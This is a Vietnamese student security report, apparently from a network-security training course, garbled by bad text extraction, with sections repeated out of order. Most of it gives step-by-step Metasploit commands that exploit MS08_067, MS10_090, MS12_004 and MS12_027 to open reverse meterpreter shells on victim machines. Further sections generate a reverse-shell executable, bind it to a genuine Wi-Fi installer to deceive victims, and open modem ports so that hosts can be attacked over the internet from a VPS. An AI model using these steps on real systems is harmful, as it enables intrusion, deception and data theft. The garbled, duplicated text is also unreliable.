Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
